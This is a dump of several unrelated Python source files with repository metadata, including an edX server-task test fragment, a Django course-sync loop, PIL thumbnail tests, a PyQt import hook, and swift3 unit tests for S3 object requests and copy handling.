expected_settings = "devstack_optimized"
expected_asset_settings = "test_static_optimized"
expected_collect_static = not is_fast and expected_settings != "devstack"
expected_messages = []
if not is_fast:
expected_messages.append(EXPECTED_PREPROCESS_ASSETS_COMMAND.format(
system="lms", asset_settings=expected_asset_settings
))
expected_messages.append(EXPECTED_PREPROCESS_ASSETS_COMMAND.format(
system="cms", asset_settings=expected_asset_settings
))
expected_messages.append(u"xmodule_assets common/static/xmodule")
expected_messages.append(u"install npm_assets")
expected_messages.append(EXPECTED_COFFEE_COMMAND.format(platform_root=self.platform_root))
expected_messages.extend(self.expected_sass_commands())
if expected_collect_static:
expected_messages.append(EXPECTED_COLLECT_STATIC_COMMAND.format(
system="lms", asset_settings=expected_asset_settings
))
expected_messages.append(EXPECTED_COLLECT_STATIC_COMMAND.format(
system="cms", asset_settings=expected_asset_settings
))
expected_messages.append(
EXPECTED_RUN_SERVER_COMMAND.format(
system="lms",
settings=expected_settings,
port=8000,
)
)
expected_messages.append(
EXPECTED_RUN_SERVER_COMMAND.format(
system="cms",
settings=expected_settings,
port=8001,
)
)
expected_messages.append(EXPECTED_CELERY_COMMAND.format(settings="dev_with_worker"))
self.assertEquals(self.task_messages, expected_messages)
def expected_sass_commands(self, system=None):
"""
Returns the expected SASS commands for the specified system.
"""
expected_sass_directories = []
expected_sass_directories.extend(EXPECTED_COMMON_SASS_DIRECTORIES)
if system != 'cms':
expected_sass_directories.extend(EXPECTED_LMS_SASS_DIRECTORIES)
if system != 'lms':
expected_sass_directories.extend(EXPECTED_CMS_SASS_DIRECTORIES)
return [EXPECTED_SASS_COMMAND.format(sass_directory=directory) for directory in expected_sass_directories]
|
devs1991/test_edx_docmode
|
pavelib/paver_tests/test_servers.py
|
Python
|
agpl-3.0
| 11,855
|
import sys
import os
import traceback
from django import db
sys.path.append('/root/wisely/wisely_project/')
os.environ['DJANGO_SETTINGS_MODULE'] = 'wisely_project.settings.production'
from django.db.models import F, Q
from django.utils import timezone
from users.tasks import get_coursera_courses, get_edx_courses, get_udemy_courses
__author__ = 'tmehta'
from users.models import CourseraProfile, EdxProfile, UdemyProfile
while True:
try:
for connection in db.connections.all():
if len(connection.queries) > 100:
db.reset_queries()
for user in CourseraProfile.objects.filter(last_updated__lt=F('user__last_login')).filter(~Q(username='')).filter(
incorrect_login=False):
print user.username
print "Start coursera"
get_coursera_courses(user)
user.last_updated = timezone.now()
print "Done Coursera"
user.save()
for user in EdxProfile.objects.filter(last_updated__lt=F('user__last_login')).filter(~Q(email='')).filter(
incorrect_login=False):
print user.email
print "Start edx"
get_edx_courses(user)
print "Done EDx"
user.last_updated = timezone.now()
user.save()
for user in UdemyProfile.objects.filter(last_updated__lt=F('user__last_login')).filter(~Q(email='')).filter(
incorrect_login=False):
print user.email
print "Start udemy"
get_udemy_courses(user)
print "Done Udemy"
user.last_updated = timezone.now()
user.save()
except Exception as e:
print traceback.format_exc()
|
TejasM/wisely
|
wisely_project/get_courses_file.py
|
Python
|
mit
| 1,721
|
__author__ = 'Yuvv'
class MyRect(object):
"""my rect object, which sames as pygame.rect.Rect,
but its value is float.
"""
def __init__(self, x, y, w, h):
self.x = x
self.y = y
self.w = w
self.h = h
@property
def top(self):
return self.y
@property
def bottom(self):
return self.y + self.h
@property
def left(self):
return self.x
@property
def right(self):
return self.x + self.w
@property
def pos(self):
return self.x, self.y
@property
def center(self):
return self.x + self.w / 2, self.y + self.h / 2
def move(self, direction):
self.x += direction[0]
self.y += direction[1]
def move_center(self, direction):
self.x += direction[0] - self.w / 2
self.y += direction[1] - self.h / 2
def move_horizontal(self, dx):
self.x += dx
def move_vertical(self, dy):
self.y += dy
|
Yuvv/LearnTestDemoTempMini
|
py-pygame/Plain/util.py
|
Python
|
mit
| 987
|
"""Test suite for module pyntrest_pil"""
from PIL import Image
from os import path, remove
import unittest
from pyntrest.pyntrest_pil import PILHandler
class PilTestSuite(unittest.TestCase):
base_path = path.abspath(path.dirname(__file__))
def test_rescale_image_dimensions_to_desired_width (self):
pil = PILHandler ( 300, 150, 1.75 )
self.assertRaises(TypeError, pil.rescale_image_dimensions_to_desired_width)
self.assertRaises(TypeError, pil.rescale_image_dimensions_to_desired_width, None)
self.assertRaises(TypeError, pil.rescale_image_dimensions_to_desired_width, None, None)
self.assertRaises(TypeError, pil.rescale_image_dimensions_to_desired_width, None, None, None)
self.assertRaises(TypeError, pil.rescale_image_dimensions_to_desired_width, None, None, None, None)
a, b, c, d = pil.rescale_image_dimensions_to_desired_width(500, 400, 200, 1)
self.assertEqual(200, a)
self.assertEqual(160, b)
self.assertEqual(200, c)
self.assertEqual(160, d)
a, b, c, d = pil.rescale_image_dimensions_to_desired_width(500, 400, 200, 2)
self.assertEqual(200, a)
self.assertEqual(160, b)
self.assertEqual(400, c)
self.assertEqual(320, d)
def test_create_image_thumbnail_if_not_present ( self ):
pil = PILHandler ( 300, 150, 1.75 )
self.assertRaises(TypeError, pil.create_image_thumbnail_if_not_present)
self.assertRaises(TypeError, pil.create_image_thumbnail_if_not_present, None)
self.assertRaises(TypeError, pil.create_image_thumbnail_if_not_present, None, None)
self.assertRaises(TypeError, pil.create_image_thumbnail_if_not_present,
'/somewhere/foo.jpg', '/somewhere/foo2.jpg')
source_file = path.join ( self.base_path, 'testdata', 'image.jpg')
target_file = path.join ( self.base_path, 'testdata', 'image-trg.jpg')
self.addCleanup(remove, target_file)
width, height = pil.create_image_thumbnail_if_not_present(source_file, target_file)
self.assertTrue(path.exists(target_file))
self.assertEqual(300, width)
self.assertEqual(199, height)
im = Image.open(target_file)
self.assertEqual((525, 348), im.size)
def test_create_album_thumbnail_if_not_present ( self ):
pil = PILHandler ( 300, 150, 1.75 )
self.assertRaises(TypeError, pil.create_album_thumbnail_if_not_present)
self.assertRaises(TypeError, pil.create_album_thumbnail_if_not_present, None)
self.assertRaises(TypeError, pil.create_album_thumbnail_if_not_present, None, None)
self.assertRaises(TypeError, pil.create_album_thumbnail_if_not_present,
'/somewhere/foo.jpg', '/somewhere/foo2.jpg')
source_file = path.join ( self.base_path, 'testdata', 'image.jpg')
target_file = path.join ( self.base_path, 'testdata', 'album-trg.jpg')
self.addCleanup(remove, target_file)
width, height = pil.create_album_thumbnail_if_not_present(source_file, target_file)
self.assertTrue(path.exists(target_file))
self.assertEqual(300, width)
self.assertEqual(150, height)
im = Image.open(target_file)
self.assertEqual((525, 262), im.size)
def test_get_geo_coordinates (self ):
pil = PILHandler ( 300, 150, 1.75 )
self.assertRaises(TypeError, pil.get_geo_coordinates)
self.assertRaises(TypeError, pil.get_geo_coordinates, None)
self.assertRaises(TypeError, pil.get_geo_coordinates,
'/somewhere/foo.jpg')
source_file = path.join ( self.base_path, 'testdata', 'im-geo.jpg')
lat, lon = pil.get_geo_coordinates(source_file)
self.assertEqual(52.51611111111111, lat)
self.assertEqual(13.375, lon)
if __name__ == '__main__':
unittest.main()
|
BastiTee/pyntrest
|
pyntrest_tests/test_pyntrest_pil.py
|
Python
|
gpl-3.0
| 4,056
|
"""
This package a pyqt distutils hook to replace PyQt5 by our own (
qregexeditor.qt).
"""
def fix_qt_imports(path):
with open(path, 'r') as f_script:
lines = f_script.read().splitlines()
new_lines = []
for l in lines:
if l.startswith("import "):
l = "from . " + l
if "from PyQt5 import" in l:
l = l.replace("from PyQt5 import", "from qregexeditor.qt import")
new_lines.append(l)
with open(path, 'w') as f_script:
f_script.write("\n".join(new_lines))
|
ColinDuquesnoy/QRegexEditor
|
qregexeditor/_hooks.py
|
Python
|
mit
| 533
|
# Copyright (c) 2014 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
from datetime import datetime
import hashlib
import os
from os.path import join
import time
from mock import patch
from swift.common import swob
from swift.common.swob import Request
from swift3.test.unit import Swift3TestCase
from swift3.test.unit.test_s3_acl import s3acl
from swift3.subresource import ACL, User, encode_acl, Owner, Grant
from swift3.etree import fromstring
from swift3.utils import mktime, S3Timestamp
from swift3.test.unit.helpers import FakeSwift
def _wrap_fake_auth_middleware(org_func):
def fake_fake_auth_middleware(self, env):
org_func(env)
if 'swift.authorize_override' in env:
return
if 'HTTP_AUTHORIZATION' not in env:
return
_, authorization = env['HTTP_AUTHORIZATION'].split(' ')
tenant_user, sign = authorization.rsplit(':', 1)
tenant, user = tenant_user.rsplit(':', 1)
env['HTTP_X_TENANT_NAME'] = tenant
env['HTTP_X_USER_NAME'] = user
return fake_fake_auth_middleware
class TestSwift3Obj(Swift3TestCase):
def setUp(self):
super(TestSwift3Obj, self).setUp()
self.object_body = 'hello'
self.etag = hashlib.md5(self.object_body).hexdigest()
self.last_modified = 'Fri, 01 Apr 2014 12:00:00 GMT'
self.response_headers = {'Content-Type': 'text/html',
'Content-Length': len(self.object_body),
'Content-Disposition': 'inline',
'Content-Language': 'en',
'x-object-meta-test': 'swift',
'etag': self.etag,
'last-modified': self.last_modified,
'expires': 'Mon, 21 Sep 2015 12:00:00 GMT',
'x-robots-tag': 'nofollow',
'cache-control': 'private'}
self.swift.register('GET', '/v1/AUTH_test/bucket/object',
swob.HTTPOk, self.response_headers,
self.object_body)
self.swift.register('PUT', '/v1/AUTH_test/bucket/object',
swob.HTTPCreated,
{'etag': self.etag,
'last-modified': self.last_modified,
'x-object-meta-something': 'oh hai'},
None)
def _test_object_GETorHEAD(self, method):
req = Request.blank('/bucket/object',
environ={'REQUEST_METHOD': method},
headers={'Authorization': 'AWS test:tester:hmac',
'Date': self.get_date_header()})
status, headers, body = self.call_swift3(req)
self.assertEqual(status.split()[0], '200')
unexpected_headers = []
for key, val in self.response_headers.iteritems():
if key in ('Content-Length', 'Content-Type', 'content-encoding',
'last-modified', 'cache-control', 'Content-Disposition',
'Content-Language', 'expires', 'x-robots-tag'):
self.assertIn(key, headers)
self.assertEqual(headers[key], str(val))
elif key == 'etag':
self.assertEqual(headers[key], '"%s"' % val)
elif key.startswith('x-object-meta-'):
self.assertIn('x-amz-meta-' + key[14:], headers)
self.assertEqual(headers['x-amz-meta-' + key[14:]], val)
else:
unexpected_headers.append((key, val))
if unexpected_headers:
self.fail('unexpected headers: %r' % unexpected_headers)
self.assertEqual(headers['etag'],
'"%s"' % self.response_headers['etag'])
if method == 'GET':
self.assertEqual(body, self.object_body)
@s3acl
def test_object_HEAD_error(self):
# HEAD does not return the body even an error response in the
# specifications of the REST API.
# So, check the response code for error test of HEAD.
req = Request.blank('/bucket/object',
environ={'REQUEST_METHOD': 'HEAD'},
headers={'Authorization': 'AWS test:tester:hmac',
'Date': self.get_date_header()})
self.swift.register('HEAD', '/v1/AUTH_test/bucket/object',
swob.HTTPUnauthorized, {}, None)
status, headers, body = self.call_swift3(req)
self.assertEqual(status.split()[0], '403')
self.assertEqual(body, '') # sanity
req = Request.blank('/bucket/object',
environ={'REQUEST_METHOD': 'HEAD'},
headers={'Authorization': 'AWS test:tester:hmac',
'Date': self.get_date_header()})
self.swift.register('HEAD', '/v1/AUTH_test/bucket/object',
swob.HTTPForbidden, {}, None)
status, headers, body = self.call_swift3(req)
self.assertEqual(status.split()[0], '403')
self.assertEqual(body, '') # sanity
req = Request.blank('/bucket/object',
environ={'REQUEST_METHOD': 'HEAD'},
headers={'Authorization': 'AWS test:tester:hmac',
'Date': self.get_date_header()})
self.swift.register('HEAD', '/v1/AUTH_test/bucket/object',
swob.HTTPNotFound, {}, None)
status, headers, body = self.call_swift3(req)
self.assertEqual(status.split()[0], '404')
self.assertEqual(body, '') # sanity
req = Request.blank('/bucket/object',
environ={'REQUEST_METHOD': 'HEAD'},
headers={'Authorization': 'AWS test:tester:hmac',
'Date': self.get_date_header()})
self.swift.register('HEAD', '/v1/AUTH_test/bucket/object',
swob.HTTPPreconditionFailed, {}, None)
status, headers, body = self.call_swift3(req)
self.assertEqual(status.split()[0], '412')
self.assertEqual(body, '') # sanity
req = Request.blank('/bucket/object',
environ={'REQUEST_METHOD': 'HEAD'},
headers={'Authorization': 'AWS test:tester:hmac',
'Date': self.get_date_header()})
self.swift.register('HEAD', '/v1/AUTH_test/bucket/object',
swob.HTTPServerError, {}, None)
status, headers, body = self.call_swift3(req)
self.assertEqual(status.split()[0], '500')
self.assertEqual(body, '') # sanity
req = Request.blank('/bucket/object',
environ={'REQUEST_METHOD': 'HEAD'},
headers={'Authorization': 'AWS test:tester:hmac',
'Date': self.get_date_header()})
self.swift.register('HEAD', '/v1/AUTH_test/bucket/object',
swob.HTTPServiceUnavailable, {}, None)
status, headers, body = self.call_swift3(req)
self.assertEqual(status.split()[0], '500')
self.assertEqual(body, '') # sanity
def test_object_HEAD(self):
self._test_object_GETorHEAD('HEAD')
def _test_object_HEAD_Range(self, range_value):
req = Request.blank('/bucket/object',
environ={'REQUEST_METHOD': 'HEAD'},
headers={'Authorization': 'AWS test:tester:hmac',
'Range': range_value,
'Date': self.get_date_header()})
return self.call_swift3(req)
@s3acl
def test_object_HEAD_Range_with_invalid_value(self):
range_value = ''
status, headers, body = self._test_object_HEAD_Range(range_value)
self.assertEqual(status.split()[0], '200')
self.assertTrue('content-length' in headers)
self.assertEqual(headers['content-length'], '5')
self.assertTrue('content-range' not in headers)
range_value = 'hoge'
status, headers, body = self._test_object_HEAD_Range(range_value)
self.assertEqual(status.split()[0], '200')
self.assertTrue('content-length' in headers)
self.assertEqual(headers['content-length'], '5')
self.assertTrue('content-range' not in headers)
range_value = 'bytes='
status, headers, body = self._test_object_HEAD_Range(range_value)
self.assertEqual(status.split()[0], '200')
self.assertTrue('content-length' in headers)
self.assertEqual(headers['content-length'], '5')
self.assertTrue('content-range' not in headers)
range_value = 'bytes=1'
status, headers, body = self._test_object_HEAD_Range(range_value)
self.assertEqual(status.split()[0], '200')
self.assertTrue('content-length' in headers)
self.assertEqual(headers['content-length'], '5')
self.assertTrue('content-range' not in headers)
range_value = 'bytes=5-1'
status, headers, body = self._test_object_HEAD_Range(range_value)
self.assertEqual(status.split()[0], '200')
self.assertTrue('content-length' in headers)
self.assertEqual(headers['content-length'], '5')
self.assertTrue('content-range' not in headers)
range_value = 'bytes=5-10'
status, headers, body = self._test_object_HEAD_Range(range_value)
self.assertEqual(status.split()[0], '416')
@s3acl
def test_object_HEAD_Range(self):
# update response headers
self.swift.register('HEAD', '/v1/AUTH_test/bucket/object',
swob.HTTPOk, self.response_headers,
self.object_body)
range_value = 'bytes=0-3'
status, headers, body = self._test_object_HEAD_Range(range_value)
self.assertEqual(status.split()[0], '206')
self.assertTrue('content-length' in headers)
self.assertEqual(headers['content-length'], '4')
self.assertTrue('content-range' in headers)
self.assertTrue(headers['content-range'].startswith('bytes 0-3'))
self.assertTrue('x-amz-meta-test' in headers)
self.assertEqual('swift', headers['x-amz-meta-test'])
range_value = 'bytes=3-3'
status, headers, body = self._test_object_HEAD_Range(range_value)
self.assertEqual(status.split()[0], '206')
self.assertTrue('content-length' in headers)
self.assertEqual(headers['content-length'], '1')
self.assertTrue('content-range' in headers)
self.assertTrue(headers['content-range'].startswith('bytes 3-3'))
self.assertTrue('x-amz-meta-test' in headers)
self.assertEqual('swift', headers['x-amz-meta-test'])
range_value = 'bytes=1-'
status, headers, body = self._test_object_HEAD_Range(range_value)
self.assertEqual(status.split()[0], '206')
self.assertTrue('content-length' in headers)
self.assertEqual(headers['content-length'], '4')
self.assertTrue('content-range' in headers)
self.assertTrue(headers['content-range'].startswith('bytes 1-4'))
self.assertTrue('x-amz-meta-test' in headers)
self.assertEqual('swift', headers['x-amz-meta-test'])
range_value = 'bytes=-3'
status, headers, body = self._test_object_HEAD_Range(range_value)
self.assertEqual(status.split()[0], '206')
self.assertTrue('content-length' in headers)
self.assertEqual(headers['content-length'], '3')
self.assertTrue('content-range' in headers)
self.assertTrue(headers['content-range'].startswith('bytes 2-4'))
self.assertTrue('x-amz-meta-test' in headers)
self.assertEqual('swift', headers['x-amz-meta-test'])
@s3acl
def test_object_GET_error(self):
code = self._test_method_error('GET', '/bucket/object',
swob.HTTPUnauthorized)
self.assertEqual(code, 'SignatureDoesNotMatch')
code = self._test_method_error('GET', '/bucket/object',
swob.HTTPForbidden)
self.assertEqual(code, 'AccessDenied')
code = self._test_method_error('GET', '/bucket/object',
swob.HTTPNotFound)
self.assertEqual(code, 'NoSuchKey')
code = self._test_method_error('GET', '/bucket/object',
swob.HTTPServerError)
self.assertEqual(code, 'InternalError')
code = self._test_method_error('GET', '/bucket/object',
swob.HTTPPreconditionFailed)
self.assertEqual(code, 'PreconditionFailed')
code = self._test_method_error('GET', '/bucket/object',
swob.HTTPServiceUnavailable)
self.assertEqual(code, 'InternalError')
@s3acl
def test_object_GET(self):
self._test_object_GETorHEAD('GET')
@s3acl(s3acl_only=True)
def test_object_GET_with_s3acl_and_keystone(self):
# for passing keystone authentication root
fake_auth = self.swift._fake_auth_middleware
with patch.object(FakeSwift, '_fake_auth_middleware',
_wrap_fake_auth_middleware(fake_auth)):
self._test_object_GETorHEAD('GET')
_, _, headers = self.swift.calls_with_headers[-1]
self.assertNotIn('Authorization', headers)
_, _, headers = self.swift.calls_with_headers[0]
self.assertNotIn('Authorization', headers)
@s3acl
def test_object_GET_Range(self):
req = Request.blank('/bucket/object',
environ={'REQUEST_METHOD': 'GET'},
headers={'Authorization': 'AWS test:tester:hmac',
'Range': 'bytes=0-3',
'Date': self.get_date_header()})
status, headers, body = self.call_swift3(req)
self.assertEqual(status.split()[0], '206')
self.assertTrue('content-range' in headers)
self.assertTrue(headers['content-range'].startswith('bytes 0-3'))
@s3acl
def test_object_GET_Range_error(self):
code = self._test_method_error('GET', '/bucket/object',
swob.HTTPRequestedRangeNotSatisfiable)
self.assertEqual(code, 'InvalidRange')
@s3acl
def test_object_GET_Response(self):
req = Request.blank('/bucket/object',
environ={'REQUEST_METHOD': 'GET',
'QUERY_STRING':
'response-content-type=%s&'
'response-content-language=%s&'
'response-expires=%s&'
'response-cache-control=%s&'
'response-content-disposition=%s&'
'response-content-encoding=%s&'
% ('text/plain', 'en',
'Fri, 01 Apr 2014 12:00:00 GMT',
'no-cache',
'attachment',
'gzip')},
headers={'Authorization': 'AWS test:tester:hmac',
'Date': self.get_date_header()})
status, headers, body = self.call_swift3(req)
self.assertEqual(status.split()[0], '200')
self.assertTrue('content-type' in headers)
self.assertEqual(headers['content-type'], 'text/plain')
self.assertTrue('content-language' in headers)
self.assertEqual(headers['content-language'], 'en')
self.assertTrue('expires' in headers)
self.assertEqual(headers['expires'], 'Fri, 01 Apr 2014 12:00:00 GMT')
self.assertTrue('cache-control' in headers)
self.assertEqual(headers['cache-control'], 'no-cache')
self.assertTrue('content-disposition' in headers)
self.assertEqual(headers['content-disposition'],
'attachment')
self.assertTrue('content-encoding' in headers)
self.assertEqual(headers['content-encoding'], 'gzip')
@s3acl
def test_object_PUT_error(self):
code = self._test_method_error('PUT', '/bucket/object',
swob.HTTPUnauthorized)
self.assertEqual(code, 'SignatureDoesNotMatch')
code = self._test_method_error('PUT', '/bucket/object',
swob.HTTPForbidden)
self.assertEqual(code, 'AccessDenied')
code = self._test_method_error('PUT', '/bucket/object',
swob.HTTPNotFound)
self.assertEqual(code, 'NoSuchBucket')
code = self._test_method_error('PUT', '/bucket/object',
swob.HTTPRequestEntityTooLarge)
self.assertEqual(code, 'EntityTooLarge')
code = self._test_method_error('PUT', '/bucket/object',
swob.HTTPServerError)
self.assertEqual(code, 'InternalError')
code = self._test_method_error('PUT', '/bucket/object',
swob.HTTPUnprocessableEntity)
self.assertEqual(code, 'BadDigest')
code = self._test_method_error('PUT', '/bucket/object',
swob.HTTPLengthRequired)
self.assertEqual(code, 'MissingContentLength')
code = self._test_method_error('PUT', '/bucket/object',
swob.HTTPPreconditionFailed)
self.assertEqual(code, 'InternalError')
code = self._test_method_error('PUT', '/bucket/object',
swob.HTTPServiceUnavailable)
self.assertEqual(code, 'InternalError')
code = self._test_method_error('PUT', '/bucket/object',
swob.HTTPCreated,
{'X-Amz-Copy-Source': ''})
self.assertEqual(code, 'InvalidArgument')
code = self._test_method_error('PUT', '/bucket/object',
swob.HTTPCreated,
{'X-Amz-Copy-Source': '/'})
self.assertEqual(code, 'InvalidArgument')
code = self._test_method_error('PUT', '/bucket/object',
swob.HTTPCreated,
{'X-Amz-Copy-Source': '/bucket'})
self.assertEqual(code, 'InvalidArgument')
code = self._test_method_error('PUT', '/bucket/object',
swob.HTTPCreated,
{'X-Amz-Copy-Source': '/bucket/'})
self.assertEqual(code, 'InvalidArgument')
code = self._test_method_error(
'PUT', '/bucket/object',
swob.HTTPCreated,
{'X-Amz-Copy-Source': '/bucket/src_obj?foo=bar'})
self.assertEqual(code, 'InvalidArgument')
# adding other query paramerters will cause an error
code = self._test_method_error(
'PUT', '/bucket/object',
swob.HTTPCreated,
{'X-Amz-Copy-Source': '/bucket/src_obj?versionId=foo&bar=baz'})
self.assertEqual(code, 'InvalidArgument')
# ...even versionId appears in the last
code = self._test_method_error(
'PUT', '/bucket/object',
swob.HTTPCreated,
{'X-Amz-Copy-Source': '/bucket/src_obj?bar=baz&versionId=foo'})
self.assertEqual(code, 'InvalidArgument')
code = self._test_method_error(
'PUT', '/bucket/object',
swob.HTTPCreated,
{'X-Amz-Copy-Source': '/bucket/src_obj?versionId=foo'})
self.assertEqual(code, 'NotImplemented')
code = self._test_method_error(
'PUT', '/bucket/object',
swob.HTTPCreated,
{'X-Amz-Copy-Source': '/src_bucket/src_object',
'X-Amz-Copy-Source-Range': 'bytes=0-0'})
self.assertEqual(code, 'InvalidArgument')
code = self._test_method_error('PUT', '/bucket/object',
swob.HTTPRequestTimeout)
self.assertEqual(code, 'RequestTimeout')
@s3acl
def test_object_PUT(self):
etag = self.response_headers['etag']
content_md5 = etag.decode('hex').encode('base64').strip()
req = Request.blank(
'/bucket/object',
environ={'REQUEST_METHOD': 'PUT'},
headers={'Authorization': 'AWS test:tester:hmac',
'x-amz-storage-class': 'STANDARD',
'Content-MD5': content_md5,
'Date': self.get_date_header()},
body=self.object_body)
req.date = datetime.now()
req.content_type = 'text/plain'
status, headers, body = self.call_swift3(req)
self.assertEqual(status.split()[0], '200')
# Check that swift3 returns an etag header.
self.assertEqual(headers['etag'], '"%s"' % etag)
_, _, headers = self.swift.calls_with_headers[-1]
# Check that swift3 converts a Content-MD5 header into an etag.
self.assertEqual(headers['etag'], etag)
def test_object_PUT_headers(self):
content_md5 = self.etag.decode('hex').encode('base64').strip()
self.swift.register('HEAD', '/v1/AUTH_test/some/source',
swob.HTTPOk, {'last-modified': self.last_modified},
None)
req = Request.blank(
'/bucket/object',
environ={'REQUEST_METHOD': 'PUT'},
headers={'Authorization': 'AWS test:tester:hmac',
'X-Amz-Storage-Class': 'STANDARD',
'X-Amz-Meta-Something': 'oh hai',
'X-Amz-Meta-Unreadable-Prefix': '\x04w',
'X-Amz-Meta-Unreadable-Suffix': 'h\x04',
'X-Amz-Meta-Lots-Of-Unprintable': 5 * '\x04',
'X-Amz-Copy-Source': '/some/source',
'Content-MD5': content_md5,
'Date': self.get_date_header()})
req.date = datetime.now()
req.content_type = 'text/plain'
status, headers, body = self.call_swift3(req)
# Check that swift3 does not return an etag header,
# specified copy source.
self.assertTrue(headers.get('etag') is None)
# Check that swift3 does not return custom metadata in response
self.assertTrue(headers.get('x-amz-meta-something') is None)
_, _, headers = self.swift.calls_with_headers[-1]
# Check that swift3 converts a Content-MD5 header into an etag.
self.assertEqual(headers['ETag'], self.etag)
self.assertEqual(headers['X-Object-Meta-Something'], 'oh hai')
self.assertEqual(headers['X-Object-Meta-Unreadable-Prefix'],
'=?UTF-8?Q?=04w?=')
self.assertEqual(headers['X-Object-Meta-Unreadable-Suffix'],
'=?UTF-8?Q?h=04?=')
self.assertEqual(headers['X-Object-Meta-Lots-Of-Unprintable'],
'=?UTF-8?B?BAQEBAQ=?=')
self.assertEqual(headers['X-Copy-From'], '/some/source')
self.assertEqual(headers['Content-Length'], '0')
def _test_object_PUT_copy(self, head_resp, put_header=None,
src_path='/some/source', timestamp=None):
account = 'test:tester'
grants = [Grant(User(account), 'FULL_CONTROL')]
head_headers = \
encode_acl('object',
ACL(Owner(account, account), grants))
head_headers.update({'last-modified': self.last_modified})
self.swift.register('HEAD', '/v1/AUTH_test/some/source',
head_resp, head_headers, None)
put_header = put_header or {}
return self._call_object_copy(src_path, put_header, timestamp)
def _test_object_PUT_copy_self(self, head_resp,
put_header=None, timestamp=None):
account = 'test:tester'
grants = [Grant(User(account), 'FULL_CONTROL')]
head_headers = \
encode_acl('object',
ACL(Owner(account, account), grants))
head_headers.update({'last-modified': self.last_modified})
self.swift.register('HEAD', '/v1/AUTH_test/bucket/object',
head_resp, head_headers, None)
put_header = put_header or {}
return self._call_object_copy('/bucket/object', put_header, timestamp)
def _call_object_copy(self, src_path, put_header, timestamp=None):
put_headers = {'Authorization': 'AWS test:tester:hmac',
'X-Amz-Copy-Source': src_path,
'Date': self.get_date_header()}
put_headers.update(put_header)
req = Request.blank('/bucket/object',
environ={'REQUEST_METHOD': 'PUT'},
headers=put_headers)
req.date = datetime.now()
req.content_type = 'text/plain'
timestamp = timestamp or time.time()
with patch('swift3.utils.time.time', return_value=timestamp):
return self.call_swift3(req)
@s3acl
def test_object_PUT_copy(self):
def do_test(src_path=None):
date_header = self.get_date_header()
timestamp = mktime(date_header)
last_modified = S3Timestamp(timestamp).s3xmlformat
status, headers, body = self._test_object_PUT_copy(
swob.HTTPOk, put_header={'Date': date_header},
timestamp=timestamp, src_path=src_path)
self.assertEqual(status.split()[0], '200')
self.assertEqual(headers['Content-Type'], 'application/xml')
self.assertTrue(headers.get('etag') is None)
self.assertTrue(headers.get('x-amz-meta-something') is None)
elem = fromstring(body, 'CopyObjectResult')
self.assertEqual(elem.find('LastModified').text, last_modified)
self.assertEqual(elem.find('ETag').text, '"%s"' % self.etag)
_, _, headers = self.swift.calls_with_headers[-1]
self.assertEqual(headers['X-Copy-From'], '/some/source')
self.assertEqual(headers['Content-Length'], '0')
do_test('/some/source')
do_test('/some/source?')
do_test('/some/source?versionId=null')
# Some clients (like Boto) don't include the leading slash;
# AWS seems to tolerate this so we should, too
do_test('some/source')
@s3acl
def test_object_PUT_copy_self(self):
status, headers, body = \
self._test_object_PUT_copy_self(swob.HTTPOk)
self.assertEqual(status.split()[0], '400')
elem = fromstring(body, 'Error')
err_msg = ("This copy request is illegal because it is trying to copy "
"an object to itself without changing the object's "
"metadata, storage class, website redirect location or "
"encryption attributes.")
self.assertEqual(elem.find('Code').text, 'InvalidRequest')
self.assertEqual(elem.find('Message').text, err_msg)
@s3acl
def test_object_PUT_copy_self_metadata_copy(self):
header = {'x-amz-metadata-directive': 'COPY'}
status, headers, body = \
self._test_object_PUT_copy_self(swob.HTTPOk, header)
self.assertEqual(status.split()[0], '400')
elem = fromstring(body, 'Error')
err_msg = ("This copy request is illegal because it is trying to copy "
"an object to itself without changing the object's "
"metadata, storage class, website redirect location or "
"encryption attributes.")
self.assertEqual(elem.find('Code').text, 'InvalidRequest')
self.assertEqual(elem.find('Message').text, err_msg)
@s3acl
def test_object_PUT_copy_self_metadata_replace(self):
date_header = self.get_date_header()
timestamp = mktime(date_header)
last_modified = S3Timestamp(timestamp).s3xmlformat
header = {'x-amz-metadata-directive': 'REPLACE',
'Date': date_header}
status, headers, body = self._test_object_PUT_copy_self(
swob.HTTPOk, header, timestamp=timestamp)
self.assertEqual(status.split()[0], '200')
self.assertEqual(headers['Content-Type'], 'application/xml')
self.assertTrue(headers.get('etag') is None)
elem = fromstring(body, 'CopyObjectResult')
self.assertEqual(elem.find('LastModified').text, last_modified)
self.assertEqual(elem.find('ETag').text, '"%s"' % self.etag)
_, _, headers = self.swift.calls_with_headers[-1]
self.assertEqual(headers['X-Copy-From'], '/bucket/object')
self.assertEqual(headers['Content-Length'], '0')
@s3acl
def test_object_PUT_copy_headers_error(self):
etag = '7dfa07a8e59ddbcd1dc84d4c4f82aea1'
last_modified_since = 'Fri, 01 Apr 2014 12:00:00 GMT'
header = {'X-Amz-Copy-Source-If-Match': etag,
'Date': self.get_date_header()}
status, header, body = \
self._test_object_PUT_copy(swob.HTTPPreconditionFailed,
header)
self.assertEqual(self._get_error_code(body), 'PreconditionFailed')
header = {'X-Amz-Copy-Source-If-None-Match': etag}
status, header, body = \
self._test_object_PUT_copy(swob.HTTPNotModified,
header)
self.assertEqual(self._get_error_code(body), 'PreconditionFailed')
header = {'X-Amz-Copy-Source-If-Modified-Since': last_modified_since}
status, header, body = \
self._test_object_PUT_copy(swob.HTTPNotModified,
header)
self.assertEqual(self._get_error_code(body), 'PreconditionFailed')
header = \
{'X-Amz-Copy-Source-If-Unmodified-Since': last_modified_since}
status, header, body = \
self._test_object_PUT_copy(swob.HTTPPreconditionFailed,
header)
self.assertEqual(self._get_error_code(body), 'PreconditionFailed')
def test_object_PUT_copy_headers_with_match(self):
etag = '7dfa07a8e59ddbcd1dc84d4c4f82aea1'
last_modified_since = 'Fri, 01 Apr 2014 11:00:00 GMT'
header = {'X-Amz-Copy-Source-If-Match': etag,
'X-Amz-Copy-Source-If-Modified-Since': last_modified_since,
'Date': self.get_date_header()}
status, header, body = \
self._test_object_PUT_copy(swob.HTTPOk, header)
self.assertEqual(status.split()[0], '200')
self.assertEqual(len(self.swift.calls_with_headers), 2)
_, _, headers = self.swift.calls_with_headers[-1]
self.assertTrue(headers.get('If-Match') is None)
self.assertTrue(headers.get('If-Modified-Since') is None)
